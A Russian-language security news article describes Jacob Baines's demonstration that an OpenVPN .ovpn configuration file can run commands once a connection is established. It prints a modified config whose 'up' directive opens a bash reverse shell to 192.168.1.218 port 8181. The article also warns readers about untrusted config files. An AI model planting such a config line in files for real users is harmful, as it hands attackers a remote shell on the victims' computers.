Атакующий может превратить безопасный конфигурационный файл во вредоносный, добавив всего несколько строк кода.
Специалисты в области кибербезопасности неоднократно предупреждали о рисках загрузки контента из непроверенных источников, поскольку многие из таких файлов могут содержать вредоносный код, нежелательное рекламное ПО или скрипты, осуществляющие вредоносную деятельность на компьютере. Исследователь Джейкоб Бэйнс (Jacob Baines) продемонстрировал, как простой конфигурационный файл (.ovpn) клиента OpenVPN может использоваться для выполнения команд на компьютере после установки VPN-соединения.
Согласно Бэйнсу, для превращения безопасного конфигурационного файла во вредоносный злоумышленникам потребуется всего лишь добавить несколько строк кода. В примере исследователя, конфигурационный файл имеет следующий вид:
remote 192.168.1.245 ifconfig 10.200.0.2 10.200.0.1 dev tun
Если злоумышленнику требуется выполнить команду, он может добавить строку script-security 2 (разрешает OpenVPN выполнять пользовательские скрипты) и запись "up", содержащую команду, которая выполнится после установки соединения.
remote 192.168.1.245 ifconfig 10.200.0.2 10.200.0.1 dev tun script-security 2 up “/bin/bash -c ‘/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&’”
Таким образом атакующий получит возможность удаленно выполнить команды на компьютере с запущенным файлом конфигурации OpenVPN.
По словам эксперта, данный метод также может использоваться для атак на пользователей компьютеров под управлением Windows с помощью скрипта PowerShell. Более подробно техника описана
Хотя Бэйнс пока не сталкивался со случаями применения описанного им метода, специалист призвал с осторожностью относиться к недоверенным ovpn файлам или использовать такие OpenVPN-клиенты, как Viscosity, снижающие риск подобных атак.
OpenVPN — свободная реализация технологии виртуальной частной сети (VPN) с открытым исходным кодом для создания зашифрованных каналов типа точка-точка или сервер-клиенты между компьютерами. Она позволяет устанавливать соединения между компьютерами, находящимися за NAT и сетевым экраном, без необходимости изменения их настроек.
